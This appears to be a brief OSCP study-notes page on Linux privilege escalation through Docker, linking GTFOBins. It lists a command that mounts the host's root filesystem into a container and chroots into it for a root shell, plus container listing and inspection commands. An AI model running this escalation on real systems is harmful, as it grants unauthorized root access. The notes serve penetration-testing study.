// notes/ PrivEsc — Linux
🐧

Docker

{% embed url="<https://gtfobins.github.io/gtfobins/docker/" %}

#linux privilege escalation#adot8
source · oscp.adot8.com · linux-privilege-escalation/docker

Docker

{% embed url="https://gtfobins.github.io/gtfobins/docker/" %}

code
01docker ps
code
01docker run -v /:/mnt --rm -it bash chroot /mnt sh
code
01docker-inspect {{.Config}} <id>